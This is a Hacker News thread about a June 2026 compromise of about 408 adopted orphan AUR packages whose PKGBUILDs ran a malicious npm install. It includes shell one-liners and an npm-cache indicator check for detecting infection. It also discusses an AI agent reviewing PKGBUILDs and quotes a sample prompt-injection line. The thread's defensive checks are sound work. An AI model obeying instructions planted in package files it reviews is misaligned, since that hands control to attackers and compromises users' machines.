6/12/2026 at 3:05:18 PM

You seem confused about how the AUR works. There is no "client" like you're talking about that can show the user anything.

There are AUR helpers, but these are completely unaffiliated with arch and the people running the AUR. The canonical, recommended way of installing arch packages is cloning a git repo, reading through the sources and then building it with makepkg. There is no client there that could show the user anything.

by Tharre

6/12/2026 at 3:43:58 PM

how comes gitlab shows custom messages to my plain old git client then?

for example when you rename gitlab repository, or push to new branch, gitlab injects custom text that you can see. Eg. with new URL or where you can create merge request on web, etc...

by harvie

6/12/2026 at 4:05:39 PM

I assume you're talking about the "remote: " messages? I've only ever seen those on push operations, not sure if they're even available for clone.

Maybe they'd be an option, but then the whole "making sure they've read the message before proceeding" part goes out the window.

by Tharre

6/12/2026 at 6:44:31 PM

Even people who do read the content of every AUR package they install could use a helpful heads up and some detail in the new threat they should be looking for.

If a package is compromised, I think most people would prefer their workflow be broken than risk installing that package.

by cmiles74

6/12/2026 at 3:43:35 PM

I think a notice on the front page of the AUR would make sense here. IMHO, a blurb on the Arch homepage with a link to a notice on the AUR page would also help.

If you don't want to list all known effected packages, at least recommend the official position that anyone using a AUR package should be reading every file of every package they use.

by cmiles74

6/12/2026 at 4:14:43 PM

IMO if numbers on Socket.dev can be trusted, then impact seems rather small (luckily). It also makes sense — I know some packages from the affected list, they're heavily outdated and their upstreams aren't maintained anymore.

Other than this — I don't know how many there are affected people in total, but AUR team probably has an exact number. I am also sure, they're doing their best to handle it accordingly to the impact.

by StrLght

6/12/2026 at 3:17:06 PM

Are you paying maintainers for that, or are you just blindly demanding things from a piece of software maintained by volunteers before saying iT'S sO uNprOfEsSiOnAL ?

by well_ackshually

6/12/2026 at 3:27:06 PM

It is a bit disappointing to not see any mention anywhere official.

I know its all volunteer work and extremely not fun at the moment, but it feels weird to not even have some sticky-no-reply on the AUR sub forum with a list of compromised packages. You have to instead try and scrape them up from around threads like here or reddit.

by GCUMstlyHarmls

6/13/2026 at 5:38:47 AM

Arch shipped a broken fontconfig package 10 days ago. The broken version is still the one offered.

by TiredOfLife

6/12/2026 at 2:27:52 PM

As people have noted, this sort of thing has become inevitable and likely to increase in occurrence unless some changes are made. I'm a big fan of the AUR PKGBUILD system, and I leverage it quite frequently to write my own. The most egregious issue in my opinion, and one of the low hanging fruit to fix, is the fact that anyone can adopt an orphaned package with no notification to end users that this has happened.

It's honestly more trouble than it's worth to get your package deleted, instead leaving orphaning as the more optimal way to relinquish control. This should be the opposite in my opinion, or at the very least the users should be made very aware that an orphaning has occurred. Perhaps that burden is more on the AUR helper like paru and yay (who I would encourage to make such a change).

by aquova

6/12/2026 at 10:37:28 AM

Here's an easy script to scan for compromised packages:

https://cscs.pastes.sh/aurvulntest20260611.sh

Not my script. It's easy to read/parse. Never pipe a script directly to bash.

by UI_at_80x24

6/12/2026 at 11:27:51 AM

A quicker alternative:

  comm -1 -2 <(pacman -Qq | sort) <(curl -s https://gist.githubusercontent.com/quantenProjects/3f768dce7331618310f016d975bf8547/raw/beef579f8a8efeed6ccf60788e5b768775550095/packages | sort)
It's never a bad time to learn about comm(1).

by sph

6/12/2026 at 6:23:19 PM

I had 15 of the infected packages installed! Luckily I have not updated any of them during the campaign. The full script checks this (in a fairly brittle way) but this comm one-liner does not.

It seems like the AUR should change the orphan recovery process, and helpers should probably offer a minimum package age feature like pnpm.

by aftbit

6/12/2026 at 8:01:12 PM

Or the more powerful join(1) which can compare individual columns.

by rjh29

6/12/2026 at 6:13:30 PM

This just checks if the package is installed, not if the installed version is infected. Presumably, if you (me...) haven't run `yay -Syu` in a while (months), we're fine, right? ...Right?

Goddamit, don't make me reinstall Arch, took me a week last time.

Update: archinstall rocks, back in business after like 15min.

by levkk

6/12/2026 at 10:47:43 AM

It isn't guaranteed that the list is conclusive.

Always check PKGBUILD and sources, AUR is not to be trusted for the most part. I'm actually more surprised that such compromise hasn't happened earlier.

by sva_

6/12/2026 at 12:48:25 PM

> hasn't happened earlier.

it happens all the time

Just not always on this scale and doesn't always end up on HN.

Similar to how you don't see every npm supply chain attack or malicious github action or similar on HN.

In general you _have to_ manually review every PKGBUILD update by hand (by diff). Everything else is neglect IMHO. Luckily for most packages this is reasonably doable, IFF you trust the upstream sources they fetch from. (As in: Most packages are a small amount of glue between pacman and a upstream source.)

As consequence AUR packages with AUR dependencies are in general "uh..., lets not do it" cases for me, as on one hand the review overhead can be a pain and on the other hand it's easy to make a mistake overlooking a change in AUR dependencies.

Still the policy which allows relatively easy adoption of orphaned packages is IMHO a problem. A adoption should be treated as a new package which just happen to have the same name. (It can be fine to not have that if arch maintainers "bless" the adoption, but IMHO that would only matter for a view very widely used packages which are candidates to be included in the official repo but aren't for e.g. license reasons.)

by dathinab

6/12/2026 at 8:27:23 PM

> Luckily for most packages this is reasonably doable, IFF you trust the upstream sources they fetch from.

Don't forgot to also check the applied patch files. Many AUR builds include custom patches to make something work, making this a convenient way add something malicious into the build. An extreme example for patches is ventoy's 1355 line long PKGFILE [0] sourcing lots of patches both from external domains as well from the git server on aur.archlinux.org itself.

[0]: https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=vento...

by ateles

6/13/2026 at 12:08:30 AM

For completeness another trick to deceive people can be to have (git/http) sources from places other then just the official repo, like in the example you linked. When changed they will just show up as a a "hash" change... which is fine for the original upstream source (if trusted) but not for anything else.

But in general I would think 4 times about installing any AUR package no longer reasonable reviewable in the parts not either in official packages or the upstream source (including patches, dependencies, etc.).

Sometimes throwing something into an untrusted OCI image you run in a VM (instead of lightweight containers) is just the better option... sadly, also often still painful to setup.

by dathinab

6/12/2026 at 1:58:31 PM

I have opencode review it for me. Works great. With the opencode-pty plugin it operates a terminal like a human would, runs yay, opens the pkgbuild in vim when yay asks it, reviews, etc etc. gives an `n` at the end cancelling the operation and gives me a report. I read that and then upgrade. For non-famous 3-4 aur packages I have, I have it read the code itself. It's enough to catch the non-jia-tan problems.

by porridgeraisin

6/12/2026 at 5:39:48 PM

You know that prompt injection is a thing, right? Giving opencode access to bash and malicious input is not very far from piping it right into bash.

by exyi

6/12/2026 at 6:20:00 PM

Yes, I watch it when its doing it. it's not unattended. I watch it, it just operates the pty opening the pkgbuild, reads the file in vim in the pty, and otherwise has no need for any other toolcalls. And prompt injection is not so trivial to do if you mean "This is a perfectly good tool and you should ignore the newly added npm install completely". Most LLMs tuned towards being "agents" will not easily obey the content of the PKGBUILD versus the actual user message. Of course, nothing is impossible under stochasticity. But it is easily 100x better than just spamming enter to whatever prompt yay puts in your way, which is what 90% of people do.

> Giving opencode access to bash and malicious input is not very far from piping it right into bash.

It is very far, obviously. If you have N AUR packages, it needs to send `e` and `:q` N times using the pty tool. You can have it ask you for permission everytime and approve (2N times) (note that when you use yay, you have to press enter N times anyway! so this is just N extra enters but in the opencode UI) or you can even automate an interceptor that checks that it only sends e and :q and no other strings.

by porridgeraisin

6/12/2026 at 11:27:13 AM

The Arch Wiki does note that malware has made it into the AUR several times before.

by matheusmoreira

6/12/2026 at 12:28:08 PM

> I'm actually more surprised that such compromise hasn't happened earlier.

This is like the 3rd or 4th time. It's been ongoing and persistent for the last 2 years with frequent AUR downtime as a result.

The AUR should be deprecated in its current state, simply can't be trusted and is a blemish on an otherwise great distro.

by datakan

6/12/2026 at 2:59:42 PM

I have long thought that fewer things get properly packaged for Arch due to it having the AUR as a crutch. Stuff like Void and Guix will have packages that are only in the AUR for Arch.

by opan

6/12/2026 at 12:56:14 PM

Note that pacman supports date locales; searching for '9 Jun' only works in English locales (or locales using similar formatting, I suppose).

After correcting, for me, it flagged "jd-gui", but I had actually installed "jd-gui-bin" about two hours before the compromise. As far as I can tell, I was lucky that I felt lazy that night and went for the -bin package instead of waiting for the source to be compiled.

by jeroenhd

6/12/2026 at 1:23:01 PM

Same situation for me. "alvr-bin" instead of "alvr". I'm a week out of date too.

by zache6

6/12/2026 at 2:28:49 PM

The (Arch) community is moving quickly to release scripts/tools.

Right now, this is the most up to date, consolidated utility to check for infection:

https://github.com/lenucksi/aur-malware-check

Also, the aur-request mailing lists has many delete/orhan requests coming through to undo the malicous commits:

https://lists.archlinux.org/archives/list/aur-requests@lists...

by keysersoze33

6/12/2026 at 2:53:20 PM

Noob question, but how do people know this is thrustworthy, since it's not from Arch / an official source?

There's a lot of voodoo in that script, i can't easily tell it's safe by reading the code.

I'd expect some reaction/solution from official Arch developers...

by DavideNL

6/12/2026 at 3:24:42 PM

You could try rkhunter or unhide from the official repositories, but I haven't tested this myself and I don't know how well they work with BPF rootkits (and/or this one specifically).

All of the packages I have triaged involved the atomic-lockfile npm package, so this is something you could try:

  npm cache ls | grep atomic-lockfile
The problem with an officially endorsed solution is that the rootkit authors could push an update that hides/removes the indicators of compromise the endorsed script checks for (e.g. it would be trivial to have the malware delete atomic-lockfile from the npm cache).

by kpcyrd

6/12/2026 at 4:11:03 PM

Love the starchart at the bottom of the repo readme.

Really conveys that sense of urgency + the stakes tied to a major malware attack like that.

by hypfer

6/12/2026 at 12:48:29 PM

I remember installing an emulator (Mednafen) on Arch Linux about a decade ago. The program failed to run because it was linked against a library my system didn't have. Turns out, the maintainer built the software on his own system and it used a library he had on his system but was not listed in the dependencies.

It is an officially maintained package and I always assumed these were built on a dedicated build server instead of some a random volunteer/home computer. Don't know if Arch still builds the same way but this event scared me enough to switch distros.

by williebeek

6/12/2026 at 2:41:27 PM

This may happen even with `pkgctl build` if a makedepends= (transitively) pulled in the shared library into the build environment, but depends= doesn't.

There's warnings in place if a .so dependency is detected, but it's up to the maintainer to notice and act on it.

For safety/security concerns, Arch Linux has been one of the driving forces in the reproducible builds project, and for large parts of the operating system it's possible to independently verify that those binaries have in fact been built from source code. It's auditing story for official packages is stronger than that of NixOS (and on par with Debian):

https://reproducible.archlinux.org/

All of this is entirely unrelated to the AUR incident however.

by kpcyrd

6/12/2026 at 2:30:52 PM

Tools exist (e.g. pkgctl) to allow you to test building and installing the package on a clean image to catch these kinds of things, maintainers should really be using these before publishing.

by reorder9695

6/12/2026 at 1:47:28 PM

It's only relatively recently that this has shifted from the norm. Debian operated this way for a long time and it was only in 2019 that they forbade it entirely.

by rcxdude

6/12/2026 at 1:34:58 PM

So what's a solution to this? Install packages like this in Docker containers without network access? I don't think we should assume it's limited to AUR. Every software source should be considered suspect in 2026, particularly with the adoption of vibe coding, and closed software is a bigger mess than open source because it's a black box.

by bachmeier

6/12/2026 at 2:12:34 PM

Yes, "untrusted" "app stores" should be sandboxed (including AUR, FlatPak, ...) Probably with a VM, at least as a default/option.

by silon42

6/12/2026 at 6:35:19 PM

As much as I hate to say it, the Qubes OS people were right. The solution is aggressively isolating apps into virtual machines. Anyone know how much my battery life is going to suffer if I bite the bullet and switch?

by craftkiller

6/12/2026 at 10:01:25 PM

SLSA adoption

by Ferret7446

6/12/2026 at 4:36:02 PM

Flatpak

by OsrsNeedsf2P

6/12/2026 at 11:06:36 AM

More news is coming out about this:

https://www.phoronix.com/news/Arch-Linux-AUR-400-Compromised

I toyed with the idea that someone should write a binary that simply emails, or alert you when it's been run... as a canary... and call that `npm`.

At this point, not renaming the npm binary is a big risk.

by keyle

6/13/2026 at 10:03:49 PM

I'm running OpenSnitch on my desktop machine to get notified about any attempted outgoing network connections by processes that I have not explicitly allowed before. I wonder if this would have at least prevented any data exfiltration if I would have installed one of the infected packages?

I'm thinking more and more that things like sandboxing and compartmentalization are becoming increasingly important on everyday desktop machines. The design of every process having at least read access to almost everything on a machine by default is not appropriate anymore.

by Ochi

6/12/2026 at 11:23:18 AM

I haven't used Arch for a few years now, but when I did the AUR was my favourite aspect.

It was never perfect from a security PoV, but in 2026 this kind of trust model feels increasingly scary.

by Retr0id

6/12/2026 at 12:47:47 PM

We are pretty far from "never perfect"

by goodpoint

6/12/2026 at 2:37:49 PM

This is one of the aspects of AUR which never fully convinced me: it purely hosts user-generated content, there's no review process or alike.

I'd really prefer to see a model where a 'community' repository contains user submitted packages which have at least one Trusted User review the package before it's merged in. This doesn't just prevent malware, but also common mistakes in general.

by WhyNotHugo

6/12/2026 at 3:14:29 PM

This is essentially what the [extra] repository is. Not using the AUR and sticking to official Arch Linux packages exclusively is a very valid and reasonable choice (that I follow myself actually).

A large number of "an Arch Linux update broke my system" is very likely due to incorrect AUR use that AUR helpers don't handle for you. There's an elaborate writeup here from just 2 months ago: https://lists.archlinux.org/archives/list/arch-dev-public@li...

by kpcyrd

6/12/2026 at 4:09:20 PM

Unless things have changed in recent times, packages in [extra] are maintained by TUs. Random users can't submit packages.

by WhyNotHugo

6/12/2026 at 3:54:26 PM

How does a user become a Trusted User? Who is paying them to review everything?

by carols10cents

6/12/2026 at 4:36:42 PM

So, could anyone sum up the "Am I owned" part of the problem to check which measures to take?

AFAIK I'm pretty likely owned if all of this is true:

- The following line shows at least one affected package:

  echo "Affected Packages Found:"; comm -12 <(pacman -Qqm | sort) <(curl -s https://cscs.pastes.sh/raw/aurvulnlist20260611.txt | sort) | { read -r l && printf '%s\n' "$l" || echo "None. No known compromised packages are installed."; }
- I updated AUR in the last 24 hours

If I did not update AUR, in the last 2 days, it should be ok (at least for this specific problem).

If I don't see affected packages from the line above, it is probably ok, but maybe there are malicious packages that are not listed and yet I'm still be owned, so I have to be careful.

Is that correct and if not, what did I get wrong? And are there any checks that I can perform, that proof the status of the system?

by sandreas

6/12/2026 at 4:51:35 PM

Nothing is necessary if you didn't update AUR packages over the last 2 days. If you wait a day further, the maintainers will cleanup these as well, after taht you can upgrade.

by porridgeraisin

6/12/2026 at 5:17:55 PM

Allright, sounds like I'm lucky. Thanks for clearing this up.

by sandreas

6/12/2026 at 10:09:16 PM

Here is the direction I'm heading in:

- I run arch on the host. The host runs qemu.

- Qemu VM 1 runs my work machine.

- Qemu VM 2 runs my financial stuff.

It took me about 2 days of work to figure out how to virtualized my machine and maybe months of tinkering after that to get it right.

I'm trying to separate general work use and payments to entirely separate security models.

I've also begun moving all dev work to cheap vps's that I run online with AI agents.

by tim-projects

6/12/2026 at 11:01:20 AM

This is especially gnarly as more people have been picking up arch distros as of late (like CachyOS).

by lordleft

6/12/2026 at 12:41:58 PM

On the bright side you can get quite far without the AUR.

I have 1,135 packages installed. Only 3 top level packages are from the AUR and 2 of those 3 are from the same author, they just happened to split their packages into a client / server architecture.

by nickjj

6/12/2026 at 1:50:47 PM

This is similar to my situation with Gentoo. Across my Gentoo systems, I have exactly one package installed from an "overlay" [0], and that's Steam. Everything else is straight out of the official package tree.

[0] ...which is -IIRC- Gentoo's term for a user-provided and entirely-unvetted collection of packages...

by simoncion

6/12/2026 at 11:23:05 AM

Installed CachyOS to replace my Win 10 installation a month ago. Not looking back! But yeah this sucks, I've mostly used Ubuntu with apt in the past. Pacman and makepkg felt a bit weird to use in the beginning.

by scary-size

6/12/2026 at 2:40:20 PM

Best to stick to official repositories only.

by Matl

6/13/2026 at 1:58:02 PM

I think that AUR is a not a very good idea.

It's essentially uncensored platform. I think they can moderate it, but obviously only for high-visibility cases.

Anyone can create package with any name, potentially impersonating any other project.

And that's all on archlinux.org domain, which inherently adds some trust to the whole concept. Trust that is unfounded.

If someone wants to distribute PKGBUILD, they should put it to Github or any other git hosting.

by vbezhenar

6/12/2026 at 2:06:34 PM

There are some AUR hooks that can help. I use https://github.com/Sohimaster/traur which also has scans for orphan package takeover patterns.

by hootz

6/13/2026 at 3:13:35 PM

Well, I seem to have been spared, purely because I have not turned on one of my laptops in a week. Like a few people here, I should probably be rethinking how I use the AUR.

by Shellban

6/12/2026 at 6:25:00 PM

"Oh a new exploit, I wonder if npm is involved at all"

Yup. Every time, I guess it's one of the most common attack vectors, can we do anything to secure NPM more against these supply chain attacks? I swear NPM is always involved in all sizable attack vectors these days.

by giancarlostoro

6/12/2026 at 9:44:19 PM

To be fair in this case it looks like npm was used as a way to run arbitrary code in a way that wouldn't look out of place immediately in a PKGBUILD file. All of this could have been done from within the install hook or anywhere else really in the PKGBUILD, it would've just been more obvious at a cursory glance if there was now randomly a curl | bash in the file.

by reorder9695

6/12/2026 at 1:42:36 PM

Not the first time this has happened recently. There were a few emails in the AUR list a few weeks ago about malicious packages, and a few reports on IRC too. The only difference in the campaign back then was the malicious npm package name (`linux-utils` in the campaign a few weeks ago).

by yaakushi

6/12/2026 at 11:22:22 AM

Be aware of false positives! I found I had two of these packages installed, clang19 and compiler-rt19, but due to my recent laziness in updating my system, mine were still the versions from July 2025 from the official repos before they had relegated them to AUR.

You can check the build and install date with `pacman -Qi <package>`.

I run Arch Linux in a container (within Fedora Silverblue), but my plan for the future:

- consider switching away from Arch Linux for my dev container, with great sadness. A rolling distro is a terrible idea in the current security climate. I loved using Arch for my dev container exactly because of AUR.

- switch to Fedora Stable, perhaps the previous release which still gets security fixes but no other updates. I am still on Fedora 43, I guess I have no rush to update to 44. - be even lazier in updating my workstation. I used to update daily when I was running Arch, then I moved to weekly last year when I got stuck with slow internet, now consider updating monthly or more (of course, unless there are critical security bugs)

- Flatpak and Flathub terrify me, it's only a matter of time until malware appears. I have had automatic upgrades disabled for a while.

- for the love of God don't touch anything that uses npm

Previously: https://news.ycombinator.com/item?id=48458931

by sph

6/12/2026 at 12:16:10 PM

I also had an affected package installed, fortunately it was from the official repo before it was dropped and became an AUR package.

by reedlaw

6/12/2026 at 12:31:40 PM

> Flatpak and Flathub terrify me

I thought Flathub has a review and approval process. Does it fall short in some fundamental way?

Any review process is more than the AUR and NPM are doing.

by doubled112

6/12/2026 at 12:43:49 PM

Flathub only reviews the manifest.

If your manifest is covertly injecting malware into the build it could be easily missed. Consider some of the manifests are simply downloading deb packages and unzipping them.

by akdev1l

6/12/2026 at 3:04:01 PM

Am I understanding right that machines without npm aren't affected by this particular strain?

The headline got my heart going pretty good this morning.

by cherrycreek00

6/12/2026 at 9:46:34 PM

The PKGBUILD files specified npm as a dependency, so it would've been installed prior to installing the malicious file, so not having npm is by no means a guarantee.

by reorder9695

6/12/2026 at 8:22:18 PM

There is a link to a shell script in the article to check if you have any impacted package installed.

by phi-go

6/12/2026 at 1:03:35 PM

Thanks for the link. It contains link to list of the affected packages, that will be useful.

by Artoooooor

6/12/2026 at 11:56:06 AM

How a person 'adopts' 408 packages and controls their build scripts?

by self_awareness

6/12/2026 at 12:17:20 PM

They were orphaned, so anyone could adopt them. There are 15k other orphans at the moment.

by Technetium

6/12/2026 at 11:28:33 AM

AUR doesn't guarantee security, its upto the user to use AUR & verify before installing anything, its very evident why arch is not used in enterprise solutions.

by virajk_31

6/12/2026 at 11:34:06 AM

It's not the AUR. It's the rolling release cycle, and probably even more importantly, lack of support options.

by fooqux

6/12/2026 at 12:29:16 PM

The AUR has absolutely nothing to do with the rolling release cycle

by datakan

6/12/2026 at 12:43:34 PM

yes & comment didn't mention that both are dependent, fooqux is correct.

by virajk_31

6/12/2026 at 1:29:17 PM

He literally said "It's the rolling release cycle" he is not correct

by datakan

6/12/2026 at 2:04:16 PM

You're reading it wrong. He's giving an alternative reason why it's not used in enterprise.

by luxpir

6/12/2026 at 12:37:29 PM

Agree

by virajk_31

6/12/2026 at 11:30:32 AM

Arch is not used in enterprise solutions because of the AUR? Can't you just not use it?

by hootz

6/12/2026 at 12:36:57 PM

AUR is choice, rolling release is the reason

by virajk_31

6/12/2026 at 2:06:37 PM

No, it's not. If Debian had a community-maintained repo of additional packages, the same thing could happen there.

The fundamental problem is having something that has very loose oversight and next to no controls. That may have worked in the past, but in the day and age of constant supply chain attacks, it's a major liability.

by this_user

6/12/2026 at 3:50:33 PM

GP was talking about why Arch isn't used in enterprise, not what happened in the post.

by NekkoDroid

6/12/2026 at 2:12:58 PM

Rolling release has nothing to do with this. It could just as well be a PPA in ubuntu or any deb repo for debian or similar.

by SahAssar

6/12/2026 at 5:32:20 PM

Makes sense.

by hootz

6/13/2026 at 2:38:30 AM

Always read the PKGBUILD. Always read the updates diffs. It’s that easy.

by jt-hill

6/13/2026 at 12:52:35 AM

Let's do some prayers for the ardent yayers.

That their layers should heal cleanly, bereft of info to steal.

So they can yay again with even more zeal, mainly.

No stress! Yes?

by LargoLasskhyfv

6/12/2026 at 11:53:07 PM

This is forcing me to rethink lots of old sysadmin habits I have.

This is good. I'm adapting, as we should.

Headed back to functional/repl languages myself. Might even drop zig.

by arminiusreturns

6/12/2026 at 11:23:23 AM

Man, I never hear good security things about npm

by QuantumNoodle

6/12/2026 at 11:24:18 AM

This doesn't really have anything to do with npm.

by Retr0id

6/12/2026 at 11:47:47 AM

From the Arch mailing list [0]

>The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something

[0] https://lists.archlinux.org/archives/list/aur-general@lists....

by notabotiswear

6/12/2026 at 12:03:44 PM

They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue.

by Retr0id

6/12/2026 at 12:30:35 PM

Perhaps there were other vectors, but npm was the one used here.

And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate.

by notabotiswear

6/12/2026 at 11:41:48 AM

anything except that it's malware installed via npm

by vitamark

6/12/2026 at 9:48:07 PM

As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.

https://news.ycombinator.com/item?id=48503258

by Retr0id

6/12/2026 at 12:39:58 PM

So true. The JavaScript ecosystem is trash.

by animitronix

6/12/2026 at 2:54:22 PM

If you're unsure what you've installed from the AUR, use: pacman -Qm

by OtomotO

6/12/2026 at 2:31:53 PM

Thanks AI!

by Noaidi

6/12/2026 at 12:38:53 PM

Wow, this is effectively the end of the AUR model. There's been a malicious package or two before, but an attack this widespread shows things are fundamentally broken. Guess I'll be switching to a new OS this weekend across multiple machines.

by animitronix

6/12/2026 at 12:55:56 PM

> Guess I'll be switching to a new OS this weekend across multiple machines.

This is a bit of an odd response. Arch very explicitly separates the AUR from everything else and doesn't make it easy to work with, because its security model has always been fundamentally broken and requires you to do your own vetting. It exists to facilitate sharing of package recipes between untrusted users. You should treat it like a pastebin.

by jorams

6/12/2026 at 2:07:01 PM

Tbh Arch itself is the most explicit about this compared to the derivatives. Manjaro etc allow installing AUR stuff directly from their main package manager

by mqus

6/12/2026 at 1:44:18 PM

> ...because its security model has always been fundamentally broken...

I disagree that "These packages are provided as-is. No work has been done to determine their safety or fitness for purpose. Use at your own risk!" is a "fundamentally broken" security model. It's one that places the burden of verification and validation on the system administrator and -in the case of the AUR- fully informs them of this fact. Treating system operators like the adults that they are isn't "fundamentally broken", but it is _much_ more work for that operator than if they relied exclusively on distro-vetted packages.

I do agree that it'd be fucking silly of OP to switch away from Arch because some of the packages in the collection of packages that are explicitly provided as "as-is and unvetted" got some malware in them.

by simoncion

6/12/2026 at 10:00:16 PM

I agree. If you use the AUR, you're essentially no longer running Arch Linux but your own private fork of Arch Linux.

by Hackbraten

6/12/2026 at 1:01:08 PM

Nothing here is "fundamentally broken". Any usage of AUR was always one step above executing random shell scripts from the net, and any official Archlinux guides were explicit about it. That's why there are no AUR helper tools in official repos and their usage was always discouraged in forums/wiki.

PKGBUILDs are easily readable/reviewable and rarely go beyond a single page. Just take a moment and be responsible and review before running executable files you download from the net. Common sense stuff. That's always been the trade-off and it hasn't really changed much in last 20 years (even though every few years everyone seems to freak out over it).

by rossvor

6/12/2026 at 1:37:02 PM

You’re not wrong, but then we ought to pump the brakes in telling everyone and their mother to hop onto arch based distros that make installing AUR packages seem as safe as any other action (via Shelly on cachyos for example)

by lordleft

6/12/2026 at 3:30:32 PM

To be fair, the advice very rarely is for people to jump onto Arch based distros.

The problem is more that the Arch value proposition kinda presupposes the sort of user that's going to "feel superior" about having it installed[0]. It leads to people that have no business installing Arch Linux (as it doesn't match their usecase) installing Arch Linux because it makes them feel cool.

I don't have a good answer for this, besides making it more apparent what people should expect from having Arch installed. My recommendation usually goes something like this:

* Do you want to have the latest version of all software, regardless of the question if it's well-tested beforehand?

* Do you want to have all software distributed in an as-close-to-upstream approach as possible? Be aware that "upstream" configuration can sometimes significantly differ from defaults most people expect. (Sometimes there's reasons for this, sometimes upstream are a bunch of obstinate jerks.)

* Are you comfortable with a terminal?

* Are you comfortable with needing to suddenly learn how to troubleshoot a broken system after a routine update?

Only if the answer to all of those is "yes", then Arch is suitable for you.

And finally, more specific to servers, where the answer should be "no" if you want to use arch:

* Do you have the expectation to never have to touch the OS after it's been configured correctly besides routine maintenance (ie. installing security updates) and maybe a big update twice a year?

I used to use Arch, before realizing that my system was gradually morphing into a bespoke mess that didn't really serve my needs and that while doing something very specific was possible, I also had to configure a bunch of mundane stuff you aren't normally required to think about - there's never a "just install, activate and adjust as needed" with Arch. All I actually wanted was a distro with more recent software than "3 years old" (Debian/Ubuntu's sluggish package inclusion is not really useful for desktops).

So I looked around and realized Fedora worked better for me: professional, clean, recent software (every 9 months updates, feature freezes are smart enough to account for ie. New Python releases) and not prone to sudden surprises.

[0]: https://wiki.archlinux.org/title/Arch_Linux is a good example of it.

by noirscape

6/12/2026 at 7:09:01 PM

To be honest, it took me way too long to figure the Arch etc crowd are hobbyists who enjoy having something which always 'needs maintenance' over the weekend. (And maybe they don't want to admit they are hobbyists because what they are doing seems Very Important.)

Sorta like 'car guys' who recommend some old thing you can wrench on.

by flomo

6/12/2026 at 8:52:40 PM

For what it is worth, while I'm sure it is right on target for some, I think that's incorrect model of a mean arch user. Updates are once a month thing for me (and the maintenance for that rarely exceeds 10m if that). I barely do any distro level tinkering, after all, I need to spare some time to improve my emacs config ;).

Basically, my model of a mean arch user would be closer to a DIYer -- likes to follow clear manual instructions, likes sturdy and non-ephemeral things, likes to know what the sausage is made of, but prefers if maintenance costs are minimized (since they will be bearing those costs and are responsible for the thing), so makes choices according to that.

by rossvor

6/13/2026 at 6:35:02 AM

Hey, your response improves my opinion of 'car guys'. Because the analogy is thin and they are looking directly at what is coming out of the 'sausage machine'. And if the result is good, they could sell the machine for profits! (Unlike computer nerds.)

I'm sticking with "hobbyists/dabblers" here, because almost nobody runs Arch in real production scenarios. Its just a fun high-touch thing people can enjoy fucking around with. Nothing wrong with that.

(That is why someone could trivially trojan hundreds of packages and it's NBD. Because "Nobody Cares." Wipe it and start over, funguy.)

by flomo

6/12/2026 at 1:53:08 PM

Honestly, it's hard to see how Arch is a usable distro for most potential users without AUR. If you want a large selection of official packages, the Debian world is going to be the better choice.

by bachmeier

6/12/2026 at 2:20:01 PM

Obviously usages vary greatly, but I doubt it's that of big deal for majority of Arch users (maybe it's different for Arch derived distros). My AUR maintained package count has been in single digits for decades (both on my home PC and work station), and I don't think it as a heavy burden to update those packages. There's a certain selection bias going on here -- I drop AUR packages if they become too annoying (if they require updates too frequently or they want a slew of other AUR only packages as dependencies), I either find alternatives or alternative sources for them (e.g. flathub).

Arch still hits the sweet spot for me -- unobtrusive, close to upstream, and well-documented enough to keep full control over your own system. Both for the times when you want to go with the most default path and for the cases when you want to deviate and go play in the weeds.

by rossvor

6/12/2026 at 2:42:41 PM

I think the issue with AUR is that you get your foot in the door with packages like spotify[1]. It does its magic to allow you to install a .deb package on your distro. I don't know how else to install the Spotify desktop app without AUR. But once you're willing to do that, why not go a little further and trust other packages?

Now, someone could argue that the Spotify app isn't important, but there's a reason it has 268 votes. A better solution would be having packages like spotify in their own repo, and a separate, you-better-verify repo for the rest.

[1] https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=spoti...

by bachmeier

6/12/2026 at 3:05:05 PM

I don't have it installed, so I can't comment if it requires constant babysitting, but looks pretty okay to me -- it has no AUR-only dependencies (++), one extra shell script (--), popular (++ given enough eyeballs...). Should be fairly easy to review, anything fishy should be fairly visible in git diff. If I needed it I would be using this PKGBUILD. It's a net gain that it exists there, someone else done most of the work for me.

> Now, someone could argue that the Spotify app isn't important, but there's a reason it has 268 votes. A better solution would be having packages like spotify in their own repo, and a separate, you-better-verify repo for the rest.

I mean yeah, but everything is trade off of volunteer + user attention. There is no trusted user™ who uses spotify, so it's not in official packages. So you as user need to maintain it yourself or rely on AUR and verify.

by rossvor

6/12/2026 at 10:07:54 PM

> There is no trusted user™ who uses spotify, so it's not in official packages

That's not the reason why Spotify is not on extra.

Spotify is not on extra because it's not FOSS.

by Hackbraten

6/12/2026 at 11:21:33 PM

That is not true, there are plenty of non-FOSS packages in extra/multilib (e.g steam, discord, nvidia). The only criteria is if there is an interested packager to maintain it.

>The large number of packages and build scripts in the various Arch Linux repositories offer free and open source software for those who prefer it, as well as proprietary software packages for those who embrace functionality over ideology.

[1] https://wiki.archlinux.org/title/Arch_Linux

[2] https://wiki.archlinux.org/title/Nonfree_applications_packag...

[3] https://bbs.archlinux.org/viewtopic.php?id=272134

[4] https://bbs.archlinux.org/viewtopic.php?id=273609

by rossvor

6/12/2026 at 5:59:53 PM

It's about as much an end of AUR, as we've seen an end of npm from its many decades of similar security/trust failures.

by megous

6/12/2026 at 2:08:07 PM

[dead]

by lenucksi

6/12/2026 at 2:02:36 PM

[flagged]

by lenucksi